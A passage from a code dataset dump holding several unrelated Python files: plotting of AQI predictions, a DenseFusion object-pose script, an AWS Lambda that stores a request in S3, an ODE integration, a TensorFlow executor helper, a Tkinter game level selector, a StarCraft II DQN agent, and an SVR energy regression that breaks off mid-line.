color='red',linewidth=0.7, linestyle='--', label='AQI predict')\r\nplt.plot(y_test, marker='x', color='blue', linewidth=0.7, linestyle='--', label='AQI real')\r\nplt.xlabel(\"Sample\")\r\nplt.ylabel(\"AQI\")\r\nplt.title(\"Prediction result\")\r\nplt.ylim(50, AQI_max+50)\r\nplt.legend(loc = 'best')\r\nplt.show()\r\n\r\n####################\r\n# compute the prediction error over the continuous time span\r\nS = (sum((Y_Treal - Y_Tpred)**2) / len(Y_Tpred))**0.5 / np.mean(Y_Treal)\r\nprint(\"S: %f\" %S[0])\r\n\r\nfig = plt.figure()\r\nplt.plot(Y_Tpred, marker='x', color='red', linewidth=0.7, linestyle='--',label='AQI predict')\r\nplt.plot(Y_Treal, marker='x', color='blue', linewidth=0.7, linestyle='--',label='AQI real')\r\nplt.xlabel(\"Random continuous date\")\r\nplt.ylabel(\"AQI\")\r\nplt.title(\"Prediction result\")\r\nplt.ylim(min(min(Y_Tpred), min(Y_Treal))-50, max(max(Y_Tpred), max(Y_Treal))+50)\r\nplt.legend(loc = 'best')\r\nplt.show()\r\n","sub_path":"PLS0227.py","file_name":"PLS0227.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"190895948","text":"### DFYW 3\n# combined with maskcnn\n\n### DFYW 2\n\n\nfrom PIL import Image\nimport os\nimport numpy as np\nimport sys\nsys.path.append(\"../\")\nfrom lib.network import PoseNet, PoseRefineNet\nimport torch\nimport numpy.ma as ma\nimport scipy.io as scio\nimport YWTools\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nfrom lib.transformations import euler_matrix, quaternion_matrix, quaternion_from_matrix,euler_from_quaternion\nimport copy\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches as patches\nfrom posecnn.YW_poseCNN import MASKCNN\nimport torchvision.transforms.functional as TF\nvector_ploter=YWTools.plot3d_vector_tool()\nvector_ploter.add_origin() # add the origin vector\nimport math\nsgmentor=MASKCNN.mask_cnn_segmentor(root_path=os.path.join(os.getcwd(),\"posecnn\",\"YW_poseCNN\"))\ntest_one_img, test_one_depth=sgmentor.get_an_test_img_and_depth() # in reality, it should come from camera.\n# vector_ploter.show()\n# Parameters\n\n\nnum_points = 1000 #???\nnum_obj = 21 # the YCB model is pre-trained with 21 classes; do not change\nborder_list = [-1, 40, 80, 120, 160, 200, 240, 280, 320, 360, 400, 440, 480, 520, 560, 600, 640, 680] #???\n# img_width = 480 # input image size\n# img_length = 640\nxmap = np.array([[j for i in range(640)] for j in range(480)]) #[0000...,1111...,222] 480,640\nymap = np.array([[i for i in range(640)] for j in range(480)]) #[0 1 2 3..., 0 1 2 3 ..., 0 1 2 3 ...] 
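(the column index at every pixel), shape 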
480,640\nnorm = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) #???\nbs=1 # batch size\niteration = 2 #???\n\n\n #camera paras\ncam_cx = 312.9869 #???\ncam_cy = 241.3109 #???\ncam_fx = 1066.778 # focal length in x (horizontal)\ncam_fy = 1067.487 # focal length in y (vertical)\ncam_scale = 10000.0 # scale\n\n\nbanana_dataset_dir=\"../datasets/yw_test/rgbd-dataset/banana/banana_1\"\ntest_image_file=os.path.join(banana_dataset_dir,\"banana_1_1_1.png\")\ntest_depth_file=os.path.join(banana_dataset_dir,\"banana_1_1_1_depth.png\")\ntest_label_file=os.path.join(banana_dataset_dir,\"banana_1_1_1_mask.png\")\ntest_bbox_file=os.path.join(banana_dataset_dir,\"banana_1_1_1_loc.txt\")\nbanana_bbox=[227,245,150,60]\n\nesti_model_file=\"../trained_checkpoints/ycb/pose_model_26_0.012863246640872631.pth\"\nrefine_model_file=\"../trained_checkpoints/ycb/pose_refine_model_69_0.009449292959118935.pth\"\n\n# rgbd dataset - banana # http://rgbd-dataset.cs.washington.edu/dataset/rgbd-dataset/\n\n\n# img = Image.open(test_image_file)\ndepth = np.array(Image.open(test_depth_file))\nlabel_banana=np.array(Image.open(test_label_file))\nimg = test_one_img\n# depth = np.array(test_one_depth)\nlabel_banana=np.array(Image.open(test_label_file))\n# 480,640 True , False\n## load Estimator Net\nestimator = PoseNet(num_points = num_points, num_obj = num_obj)\nestimator.cuda()\nestimator.load_state_dict(torch.load(esti_model_file))\nestimator.eval()\nrefiner = PoseRefineNet(num_points = num_points, num_obj = num_obj)\nrefiner.cuda()\nrefiner.load_state_dict(torch.load(refine_model_file))\nrefiner.eval()\n\n## Prediction\n\nposecnn_meta = scio.loadmat(\"test/000003.mat\")\nlabel = np.array(posecnn_meta['labels']) #segmentation label: 1 where an object is present, 0 otherwise\nposecnn_rois = np.array(posecnn_meta['rois']) #rois are used to obtain the bounding boxes\n#rois\n# number of rows = number of objects\n# column 0:\n# column 1: object id\n# columns 3 and 5: rowmin, rowmax\n# columns 2 and 4: colmin, colmax\n# lst = posecnn_rois[:, 1:2].flatten() #[ 1. 20. 14. 6. 
19.] # means there are 5 objects in the scene\nlst = [1] # assume only banana\nmy_result_wo_refine = [] #???\nmy_result = []\n\n\n\nfor idx in range(len(lst)):\n    itemid = lst[idx]\n    try:\n\n        #eval by segmentor\n        seg_res=sgmentor.get_eval_res_by_name(TF.to_tensor(img),\"banana\")\n        x1,y1,x2,y2=seg_res[\"box\"]\n        banana_bbox_draw=sgmentor.get_box_rcwh(seg_res[\"box\"])\n        rmin, rmax, cmin, cmax = int(x1),int(x2),int(y1),int(y2)\n\n        # rmin, rmax, cmin, cmax = YWTools.get_bbox(posecnn_rois,border_list,img_width,img_length,idx)\n\n        mask_depth = ma.getmaskarray(ma.masked_not_equal(depth, 0)) #ok\n        # mask_label = ma.getmaskarray(ma.masked_equal(label, itemid)) #label from 000003.mat\n\n        label_banana = np.squeeze(seg_res[\"mask\"])\n\n        # label_banana = ma.getmaskarray(ma.masked_not_equal(label_banana,0))\n        label_banana = ma.getmaskarray(ma.masked_greater(label_banana,0.5))\n        label_banana_nonzeros=label_banana.flatten().nonzero()\n        # label_banana=np.array(Image.open(test_label_file))\n\n        mask_label = ma.getmaskarray(ma.masked_equal(label_banana, itemid)) #label from banana label\n        mask = mask_label * mask_depth\n\n        # Add the patch to the Axes\n        # fig, ax = plt.subplots(1)\n        # ax.imshow(depth)\n        # plt.show()\n\n        # plt.imshow(mask)\n        # plt.show()\n        # plt.imshow(mask_depth)\n        # plt.show()\n        # plt.imshow(mask_label)\n        # plt.show()\n        # plt.imshow(mask)\n        # plt.show()\n        mask_nonzeros=mask[:].flatten().nonzero()\n        #(3634)[18993 18994 18995 18996 18997]\n        choose = mask[rmin:rmax, cmin:cmax].flatten().nonzero()[0]\n        if len(choose) > num_points:\n            c_mask = np.zeros(len(choose), dtype=int)\n            c_mask[:num_points] = 1\n            np.random.shuffle(c_mask)\n            choose = choose[c_mask.nonzero()]\n        else:\n            print(\"mask has fewer than num_points pixels; padding by wrapping\")\n            choose = np.pad(choose, (0, num_points - len(choose)), 'wrap')\n\n        depth_masked = depth[rmin:rmax, cmin:cmax].flatten()[choose][:, np.newaxis].astype(np.float32)\n        xmap_masked = xmap[rmin:rmax, cmin:cmax].flatten()[choose][:, np.newaxis].astype(np.float32)\n        ymap_masked = ymap[rmin:rmax, cmin:cmax].flatten()[choose][:, np.newaxis].astype(np.float32)\n        choose = np.array([choose])\n\n        pt2 = depth_masked / cam_scale\n        pt0 = (ymap_masked - cam_cx) * pt2 / cam_fx\n        pt1 = (xmap_masked - cam_cy) * pt2 / cam_fy\n        cloud = np.concatenate((pt0, pt1, pt2), axis=1)\n\n        img_masked = np.array(img)[:, :, :3]\n        img_masked = np.transpose(img_masked, (2, 0, 1))\n        img_masked = img_masked[:, rmin:rmax, cmin:cmax]\n\n        cloud = torch.from_numpy(cloud.astype(np.float32))\n        choose = torch.LongTensor(choose.astype(np.int32))\n        img_masked = norm(torch.from_numpy(img_masked.astype(np.float32)))\n        index = torch.LongTensor([itemid - 1])\n\n        cloud = Variable(cloud).cuda()\n        choose = Variable(choose).cuda()\n        img_masked = Variable(img_masked).cuda()\n        index = Variable(index).cuda()\n\n        cloud = cloud.view(1, num_points, 3)\n        img_masked = img_masked.view(1, 3, img_masked.size()[1], img_masked.size()[2])\n\n        pred_r, pred_t, pred_c, emb = estimator(img_masked, cloud, choose, index)\n        pred_r = pred_r / torch.norm(pred_r, dim=2).view(1, num_points, 1)\n\n        pred_c = pred_c.view(bs, num_points)\n        how_max, which_max = torch.max(pred_c, 1)\n        pred_t = pred_t.view(bs * num_points, 1, 3)\n        points = cloud.view(bs * num_points, 1, 3)\n\n        my_r = pred_r[0][which_max[0]].view(-1).cpu().data.numpy()\n        my_t = (points + pred_t)[which_max[0]].view(-1).cpu().data.numpy()\n        my_pred = np.append(my_r, my_t)\n        my_result_wo_refine.append(my_pred.tolist())\n\n        for ite in range(0, iteration):\n            T = Variable(torch.from_numpy(my_t.astype(np.float32))).cuda().view(1, 
3).repeat(num_points, 1).contiguous().view(1, num_points, 3)\n            my_mat = quaternion_matrix(my_r)\n            R = Variable(torch.from_numpy(my_mat[:3, :3].astype(np.float32))).cuda().view(1, 3, 3)\n            my_mat[0:3, 3] = my_t\n\n            new_cloud = torch.bmm((cloud - T), R).contiguous()\n            pred_r, pred_t = refiner(new_cloud, emb, index)\n            pred_r = pred_r.view(1, 1, -1)\n            pred_r = pred_r / (torch.norm(pred_r, dim=2).view(1, 1, 1))\n            my_r_2 = pred_r.view(-1).cpu().data.numpy()\n            my_t_2 = pred_t.view(-1).cpu().data.numpy()\n            my_mat_2 = quaternion_matrix(my_r_2)\n\n            my_mat_2[0:3, 3] = my_t_2\n\n            my_mat_final = np.dot(my_mat, my_mat_2)\n            my_r_final = copy.deepcopy(my_mat_final)\n            my_r_final[0:3, 3] = 0\n            my_r_final = quaternion_from_matrix(my_r_final, True)\n            my_t_final = np.array([my_mat_final[0][3], my_mat_final[1][3], my_mat_final[2][3]])\n\n            my_pred = np.append(my_r_final, my_t_final)\n            my_r = my_r_final\n            my_t = my_t_final\n\n        my_euler_form_r=euler_from_quaternion(my_r)\n        print(\"my_euler_form_r\",my_euler_form_r)\n        #my_euler_form_r : (0.9198490563735781, -0.007832527911272334, -0.47081842893943104)\n        my_euler_yaw=list(my_euler_form_r)[2]\n        my_rotation_matrix_from_euler=euler_matrix(my_euler_form_r[0],my_euler_form_r[1],my_euler_form_r[2])\n        # [[0.90679773  0.18969227 - 0.37647672  0.]\n        # [-0.41995766  0.48440958 - 0.76745223  0.]\n        # [0.03678917  0.85402822  0.51892423  0.]\n        # [0.  0.  0.  1.]]\n        x=np.dot(my_rotation_matrix_from_euler,np.array([[1,0,0,1]]).transpose()).flatten()\n        y=np.dot(my_rotation_matrix_from_euler,np.array([[0,1,0,1]]).transpose()).flatten()\n        z=np.dot(my_rotation_matrix_from_euler,np.array([[0,0,1,1]]).transpose()).flatten()\n        newvs=[]\n\n        grasp_vector=[math.cos(my_euler_yaw),math.sin(my_euler_yaw),0]\n        # newvs.append([0,0,0,grasp_vector[0],grasp_vector[1],grasp_vector[2]])\n\n        mx=my_rotation_matrix_from_euler[0,0:3]\n        my=my_rotation_matrix_from_euler[1,0:3]\n        mz=my_rotation_matrix_from_euler[2,0:3]\n        newvs.append([0,0,0,mx[0],mx[1],mx[2]])\n        newvs.append([0,0,0,my[0],my[1],my[2]])\n        newvs.append([0,0,0,mz[0],mz[1],mz[2]])\n        # newvs.append([0,0,0,x[0],x[1],x[2]])\n        # newvs.append([0,0,0,y[0],y[1],y[2]])\n        # newvs.append([0,0,0,z[0],z[1],z[2]])\n        # newvs.append([0,0,0,x[0],x[1],0])\n        # newvs.append([0,0,0,1,1,1])\n        # newvs.append([0,0,0,y[0],y[1],0])\n        # newvs.append([0,0,0,z[0],z[1],0])\n        vector_ploter.addvs(newvs)\n\n        # Here 'my_pred' is the final pose estimation result after refinement ('my_r': quaternion, 'my_t': translation)\n\n        my_result.append(my_pred.tolist())\n\n        #plot mask\n        maskfig = plt.figure(\"mask plot\")\n        ax = maskfig.add_subplot(111)\n        rect = patches.Rectangle(xy=(banana_bbox_draw[1],banana_bbox_draw[0]), width=banana_bbox_draw[2], height=banana_bbox_draw[3], linewidth=5, edgecolor='w', facecolor='none')\n        ax.imshow(img)\n        # patches.Rectangle(xy=(),width=,height=)\n        # ax.imshow(np.squeeze(seg_res[\"mask\"]))\n        # ax.imshow(label_banana)\n        ax.add_patch(rect)\n        # plt.show()\n\n    except ZeroDivisionError:\n        print(\"PoseCNN Detector Lost {0} at No.{1} keyframe\".format(itemid, idx))\n        my_result_wo_refine.append([0.0 for i in range(7)])\n        my_result.append([0.0 for i in range(7)])\n\nprint(\"my_result,\",my_result)\nvector_ploter.show()","sub_path":"DenseFusion/tools/DFYW3_backup.py","file_name":"DFYW3_backup.py","file_ext":"py","file_size_in_byte":11528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"52761176","text":"import boto3\nimport json\nimport uuid\n\nbucket_name = 'rebeccacode-repo-a1'\n\n\ndef lambda_handler(event, 
context):\n result = {'request_id': '', 'request_url': ''}\n\n try:\n s3_client = boto3.client('s3')\n\n request_id = new_id()\n file_name = '{}-olympic-data-request.json'.format(request_id)\n\n data = {'request_id': request_id, 'criteria': event['criteria']}\n\n s3_client.put_object(Bucket=bucket_name,\n Key=file_name,\n Body=json.dumps(data),\n ContentEncoding='utf-8',\n ContentType='application/json',\n Metadata={'request_id': request_id})\n\n result['request_id'] = request_id\n result['request_url'] = s3_client.generate_presigned_url(\n ClientMethod='get_object',\n Params={\n 'Bucket': bucket_name,\n 'Key': file_name\n }\n )\n\n except Exception as e:\n print(e)\n raise e\n\n return result\n\n\ndef new_id():\n return str(uuid.uuid4())","sub_path":"aws/lambda/create-olympic-data-request.py","file_name":"create-olympic-data-request.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297503328","text":"from ATFCommons import ATFCommons as ATFC\nimport ATFCommons\nimport sys\n\nclass ATFCommonsWrapper:\n\n def __init__(self):\n self._atfc= ATFC()\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n\n\n def Get_As_List(self, obj, retDictKeys=True):\n #self._atfc.Debug_Log(\"%s - %s \" % (ATFCommons.funcname(), obj))\n print(\"%s - %s \" % (ATFCommons.funcname(), obj))\n return self._atfc.Get_As_List(obj, retDictKeys)\n","sub_path":"src/ATFCommonsWrapper.py","file_name":"ATFCommonsWrapper.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224475282","text":"from pylab import *\nfrom scipy.integrate import odeint\nimport matplotlib\n\n\nlambda_0=0\nr=0.1 \n\nxi_step = .05\nxi_interval = linspace(-11,11,int(22/xi_step),endpoint=0)\n\n#HS pulse params\nomega = 3\nrho = 1/(sqrt(5))\npsi = arctan(2)\n\n\n\n\n#integrate the connection around gamma_3\ntheta_init=0\ns_numsteps=10000\ndelta = 2*pi/s_numsteps\nsspan=linspace(0,2*pi,130)\n\n###############################################################################\n#Define the xi_derivative for fixed lambda\ndef u_xi(xi,u,lam,sigma):\n q1 = cos(omega*log(cosh(xi)))/cosh(xi)\n q2 = -sin(omega*log(cosh(xi)))/cosh(xi)\n a_31 = (lam*rho*cos(psi) + 1 - omega**2 - \n (2 - omega**2)*(q2**2 + 3*q1**2) + 6*omega*q1*q2)\n a_32 = (-lam*rho*sin(psi) - 2*omega - \n 2*(2 - omega**2)*q1*q2 + 3*omega*(q1**2 + 3*q2**2))\n a_41 = (lam*rho*sin(psi) + 2*omega - \n 2*(2 - omega**2)*q1*q2 - 3*omega*(3*q1**2 +q2**2))\n a_42 = (lam*rho*cos(psi) + 1 - omega**2 - \n (2 - omega**2)*(q1**2 + 3*q2**2) - 6*omega*q1*q2)\n\n A = array([[0,0,1,-1,0,0],\n [a_32,0,0,0,0,0],\n [a_42,0,0,0,0,1],\n [-a_31,0,0,0,0,-1],\n [-a_41,0,0,0,0,0],\n [0,-a_41,a_31,-a_42,a_32,0]])\n #u_x = A*u\n u_x = (A - sigma*eye(6)).dot(u)\n return(u_x)\n\n###############################################################################\n#Runge-Kutta integrator for the xi interval\ndef xi_RK4(u_init,lam,sigma,time,step):\n #create storage array for trajectory\n traj = zeros([len(time),len(u_init)],complex)\n traj[0,:] = u_init\n\n #integrate up to xi_end\n for i in range(len(time)-1):\n k1 = u_xi(time[i],traj[i,:],lam,sigma)\n temp = traj[i,:] + (step/2.0)*k1\n k2 = u_xi(time[i]+(step/2.0),temp,lam,sigma)\n temp = traj[i,:] + (step/2.0)*k2\n k3 = u_xi(time[i]+(step/2.0),temp,lam,sigma)\n temp = traj[i,:] + step*k3\n k4 = u_xi(time[i]+step,traj[i,:],lam,sigma)\n traj[i+1,:] = traj[i,:] + (step/6.0)*(k1+2.0*k2+2.0*k3+k4)\n 
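# full RK4 sweep over the xi grid is complete; hand back the whole trajectory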
\n return(traj)\n\n###############################################################################\n\ndef theta_integration(theta,s,xi_interval,xi_step):\n s\n present_s = s\n next_s = s + delta \n last_s = s - delta\n \n present_lambda = lambda_0 + r*exp(1j*present_s) \n next_lambda = lambda_0 + r*exp(1j*(next_s)) \n last_lambda = lambda_0 + r*exp(1j*(last_s))\n\n lam= present_lambda\n p = 2*omega + lam*rho*(sin(psi))\n tau = 1 - omega**2 + lam*rho*cos(psi)\n sigma = (sqrt(2))*(sqrt(tau + sqrt(tau**2 + p**2)))\n present_sigma = sigma\n present_ksi_plus = [2*sigma, -2*p, sigma**2, -(sigma**2), -2*p,\n sigma*(sigma**2 - 2*tau) ]\n \n lam= next_lambda\n p = 2*omega + lam*rho*(sin(psi))\n tau = 1 - omega**2 + lam*rho*cos(psi)\n sigma = (sqrt(2))*(sqrt(tau + sqrt(tau**2 + p**2)))\n next_sigma = sigma\n next_ksi_plus = [2*sigma, -2*p, sigma**2, -(sigma**2), -2*p,\n sigma*(sigma**2 - 2*tau) ]\n \n lam= last_lambda\n p = 2*omega + lam*rho*(sin(psi))\n tau = 1 - omega**2 + lam*rho*cos(psi)\n sigma = (sqrt(2))*(sqrt(tau + sqrt(tau**2 + p**2)))\n last_sigma = sigma\n last_ksi_plus = [2*sigma, -2*p, sigma**2, -(sigma**2), -2*p,\n sigma*(sigma**2 - 2*tau) ]\n \n next_u = xi_RK4(next_ksi_plus,next_lambda,\n next_sigma,xi_interval,xi_step)\n\n u = xi_RK4(present_ksi_plus,present_lambda,\n present_sigma,xi_interval,xi_step)\n\n last_u = xi_RK4(last_ksi_plus,last_lambda,\n last_sigma,xi_interval,xi_step)\n\n u_s = (next_u[-1,:] - last_u[-1,:])/(2*delta)\n\n theta_s = imag(conj(u[-1,:])*(u_s))/real(conj(u[-1,:])*u[-1,:])\n \n return(theta_s)\n\n###############################################################################\n\ntheta = odeint(theta_integration, 0, sspan, args = (xi_interval,xi_step))\ntheta = theta/(2*pi)\n\nprint(theta)","sub_path":"HS-Pulse/integration_at_L_prime_HSpulse.py","file_name":"integration_at_L_prime_HSpulse.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"435698467","text":"\"\"\"Utility functions related to distributed training executor setup.\"\"\"\nimport json\nimport logging\nimport os\nimport tensorflow as tf\n\nCHIEF = 'chief'\nEVALUATOR = 'evaluator'\nWORKER = 'worker'\nPARAMETER_SERVER = 'ps'\nLOCAL_MODE = 'local'\n\n\ndef get_executor_task_type():\n \"\"\"Get executor task type (chief/evaluator/worker/ps or local) from TF_CONFIG.\"\"\"\n tf.logging.info(\"Getting executor context info...\")\n tf_config = os.environ.get(\"TF_CONFIG\")\n\n # With multiworker training, tf_config contains tasks in the cluster, and each task's type in the cluster.\n # To get ther worker/evaluator status, need to fetch corresponding fields in the config (json format).\n # Read more at https://www.tensorflow.org/guide/distributed_training#setting_up_tf_config_environment_variable\n if tf_config:\n tf_config_json = json.loads(tf_config)\n\n # Logging the status of current worker/evaluator\n logging.info(\"Running with TF_CONFIG: {}\".format(tf_config_json))\n task_type = tf_config_json.get('task', {}).get('type')\n logging.info(\"=========== Current executor task type: {} ==========\".format(task_type))\n return task_type\n else:\n logging.info(\"=========== No TF_CONFIG found. Running {} mode. 
==========\".format(LOCAL_MODE))\n return LOCAL_MODE\n","sub_path":"src/detext/utils/executor_utils.py","file_name":"executor_utils.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584051007","text":"import tkinter\r\nfrom tkinter import ttk\r\nfrom pickle import dump, load\r\nimport os\r\n\r\nfrom envGenerators import higtmap\r\nfrom renderer.mainRender import renderEngine\r\nfrom pawns.panda import PandaPawn\r\nfrom editor.pythonEditor import editor\r\n\r\nlevel = None\r\n\r\nclass levelSelector(tkinter.Tk):\r\n \"\"\"tk window to select window\r\n\r\n a tk window used to get the level the user wants to play as well as initating the discriptor of the level in its txt box\r\n\r\n sublcass tk\r\n \"\"\"\r\n def __init__(self):\r\n tkinter.Tk.__init__(self)\r\n \"initaite supercalss tk\"\r\n self.title(\"pyplaygrounds level selector\")\r\n\r\n selector = tkinter.Label(self, text=\"plz select a level\")\r\n selector.pack() \r\n\r\n levles = load(open(f\"{os.path.dirname(os.path.abspath(__file__))}/envGenerators/levelData/allLevels.p\",\"rb\"))\r\n # load the currently finisched levels from file\r\n self.selector = ttk.Combobox(self, values = levles)\r\n \"\"\"slect witch level\r\n\r\n a combobox to select witch level to load\r\n \"\"\"\r\n self.selector.bind(\"<>\", self.levelSelecotValueChanged)\r\n self.selector.pack()\r\n\r\n self.discriptionBox = tkinter.Text(self)\r\n \"\"\"what the level is about\r\n\r\n a txt widget that discribes what the level is all about\r\n \"\"\"\r\n self.discriptionBox.pack()\r\n\r\n self.executeLevel = tkinter.Button(self, text = \"play\", command=self.runFunction)\r\n \"\"\"run the level\r\n\r\n a button widet that is used to initate the level\r\n \"\"\"\r\n self.executeLevel.pack()\r\n\r\n \r\n def levelSelecotValueChanged(self, *vals):\r\n \"\"\"called when a level is selected by tk\"\"\"\r\n self.loadLevelDoc(self.selector.get(), self.discriptionBox)\r\n \r\n @staticmethod\r\n def loadLevelDoc(level, discriptionBox):\r\n \"\"\"load the level doc saved as a txt file and render it to a text box\r\n\r\n @param level: the level to load from\r\n @type level: int\r\n \"\"\"\r\n discriptionBox.delete('1.0',tkinter.END)\r\n #load the doc\r\n with open(f\"{os.path.dirname(os.path.abspath(__file__))}/envGenerators/levelData/level{level}/doc.txt\") as f:\r\n data = f.read().splitlines()\r\n for line in data:\r\n discriptionBox.insert(tkinter.END, line)\r\n discriptionBox.insert(tkinter.END, \"\\n\")\r\n\r\n def runFunction(self):\r\n \"\"\"run the level\r\n\r\n deconstruct this widget and initiate the level\r\n \"\"\"\r\n global level\r\n level = self.selector.get()\r\n self.quit()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n selector = levelSelector()\r\n \"the selectorwidget\"\r\n selector.mainloop()\r\n\r\n hmap = higtmap.higthmap(level)\r\n \"the higtmat that was selected\"\r\n engine = renderEngine(hmap)\r\n \"the renderengine to run on\"\r\n hmap.setEngine(engine)\r\n\r\n CurrentEditor = editor(engine, hmap)\r\n \"the edutior to write script in\"\r\n #____________execute script\r\n #deconstructor\r\n","sub_path":"pyplaygrounds/levelSelector.py","file_name":"levelSelector.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115453781","text":"import random\nimport time\nimport sc2\nimport torch\n\nfrom sc2 import Race, Difficulty\nfrom sc2.constants import *\nfrom 
sc2.player import Bot, Human\nfrom sc2.unit_command import UnitCommand\nfrom sc2.position import Point2, Point3\n\nfrom FeatureRGB import UnitFeature\nfrom Net import DQN\nfrom Macro import Macro\n\nLOAD_MODEL = True\nMODEL_NAME = '0000250.pt'\n\nclass RLAgent(sc2.BotAI):\n\n # Features\n f_unit = None\n net = None\n macro = None\n\n # variables for RL\n obs = None\n\n def __init__(self):\n self.macro = Macro(self)\n\n self.available_actions = ['NO_OP', 'TRAIN_SCV', 'TRAIN_MARINE', 'BUILD_SUPPLYDEPOT', 'BUILD_BARRACK']\n self.require_position = [False, False, False, True, True]\n\n self.DQN = DQN(100 , len(self.available_actions))\n\n self.prev_obs = None\n self.prev_a = None\n self.prev_score = 0\n\n self.g_episode = 0\n\n # Variables for reward shaping\n self.prev_collected_minerals = 0\n self.prev_collected_minerals_efficiency = 0\n\n if LOAD_MODEL:\n self.DQN.load(MODEL_NAME)\n\n\n def on_start(self):\n self._client.game_step = 23\n\n '''\n Variables\n s = prev_obs\n a = prev_a\n r = ?? # 지금은 sparse reward\n s' = obs\n done # 시나리오 끝날 때 되면 done 수동처리 및 환경리셋\n '''\n async def on_step(self, iteration):\n if self.state.player_result:\n self.prev_obs = None\n self.prev_a = None\n self.prev_score = 0\n self.prev_collected_minerals = 0\n self.prev_collected_minerals_efficiency = 0\n\n self.DQN.global_episode += 1\n print('global_episode : %6d\\t|\\tglobal_step : %10d\\t|\\taccum_reward : %5d\\t|\\tepsilon : %.2f' % (self.DQN.global_episode, self.DQN.global_step, self.state.score.score, self.DQN.epsilon))\n\n await self._client.reset()\n\n if self.DQN.global_episode % 50 == 0:\n try:\n self.DQN.save()\n except:\n pass\n await self.macro.default_action()\n\n self.DQN.global_step += 1\n\n # Reward for Parameter\n collected = self.state.score.collected_minerals - self.prev_collected_minerals\n param_r = 0\n if collected < self.prev_collected_minerals_efficiency:\n param_r = -1\n\n # Reward for Action\n action_r = self.state.score.score - self.prev_score\n\n obs = self.state.feature['render']['unit_type']\n unit_feature = UnitFeature(feature_map=obs)\n obs = unit_feature.dataset\n\n action, param = self.DQN.get_action(obs)\n\n\n if self.prev_obs is not None:\n self.DQN.push_to_buffer(self.prev_obs, self.prev_a, action_r, param_r, obs)\n\n if self.DQN.global_step > 10000 and len(self.DQN.replay_buffer) > 100:\n self.DQN.train()\n\n if self.DQN.global_step % 10000 == 0:\n self.DQN.update_target()\n\n self.prev_obs = obs\n self.prev_a = action\n self.prev_param = param\n self.prev_score = self.state.score.score\n self.prev_collected_minerals = self.state.score.collected_minerals\n self.prev_collected_minerals_efficiency = collected\n\n q_value = self.DQN.get_probs(obs)\n debug = 'NO_OP \\t\\t' + str(q_value[0]) + '\\nTRAIN_SCV \\t\\t' + str(q_value[1]) + '\\nTRAIN_MARINE \\t\\t' + str(q_value[2]) + '\\nBUILD_SUPPLYDEPOT\\t\\t' + str(q_value[3]) + '\\nBUILD_BARRACK \\t\\t' + str(q_value[4]) + '\\nACTION_REWARD \\t\\t' + str(action_r) + '\\nPRAM_REWARD \\t\\t' + str(param_r) + '\\nMEMORY \\t\\t' + str(len(self.DQN.replay_buffer))\n self._client.debug_text_2d(text=debug, pos=Point2((0.05, 0.3)), size=14)\n await self._client.send_debug()\n\n try:\n await self.macro.run(action, param)\n except:\n pass\n\n\n\n def on_end(self, result):\n pass\n\n\n\n\ndef main():\n\n sc2.run_game(sc2.maps.get(\"BuildMarines_bugfix\"), [\n Bot(Race.Terran, RLAgent())\n ], realtime=False\n )\n '''\n sc2.run_game(sc2.maps.get(\"BuildMarines\"), [\n Human(Race.Terran)\n ], realtime=True\n )\n '''\n\nif __name__ == 
'__main__':\n main()\n","sub_path":"RL/RLAgent.py","file_name":"RLAgent.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"324499138","text":"import numpy as np\nfrom sklearn.svm import SVR\nimport matplotlib.pyplot as plt\nimport datetime\nimport random\nimport time\nimport operator\nimport sys\narg = sys.argv[1]\nfnov = open('../data/Nov Data.csv', 'r')\nfoct = open('../data/Oct Data.csv', 'r')\nline = foct.readline()\nline = foct.readline()\nvals = []\narg1 =-1\nif arg == \"mon\":\n arg1 = 0\nelif arg == \"tue\":\n arg1 = 1\nelif arg == \"wed\":\n arg1 = 2\nelif arg == \"thur\":\n arg1 = 3\nelif arg == \"fri\":\n arg1 = 4\nelif arg == \"sat\":\n arg1 = 5\nelif arg == \"sun\":\n arg1 = 6\nxdates = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]\n \ninput_vector = []\ninput_vector2 = []\noutput_vector = []\noutput_vector2 = []\nyo1 = []\nyo2 = []\n\nvals = []\nlc_cnt =2\nwhile line:\n arr = line.split(',')\n if 0 == 0:\n dt =datetime.datetime.strptime(arr[2],\"%m/%d/%y %H:%M\")\n #timeInSec = time.mktime(dt.timetuple())\n temp = arr[10]\n holiday = int(arr[11])\n features = []\n features = features + [dt.weekday()]\n features = features + [dt.hour]\n features = features + [int(temp)]\n features = features + [int(holiday)]\n input_vector = input_vector + [features]\n output_vector = output_vector + [arr[8]]\n \n line = foct.readline()\n \nfoct.close()\n\nline = fnov.readline()\nline = fnov.readline()\n\nwhile line:\n arr = line.split(',')\n if 0 == 0:\n dt =datetime.datetime.strptime(arr[2],\"%m/%d/%y %H:%M\")\n #timeInSec = time.mktime(dt.timetuple())\n temp = arr[10]\n holiday = int(arr[11])\n features = []\n yo1 = yo1 + [dt.toordinal()]\n features = features + [dt.weekday()]\n features = features + [dt.hour]\n features = features + [int(temp)]\n features = features + [int(holiday)]\n input_vector2 = input_vector2 + [features]\n output_vector2 = output_vector2 + [arr[8]]\n \n line = fnov.readline()\n \nfnov.close()\n\nsvr_rbf = SVR(kernel='rbf', C=200, 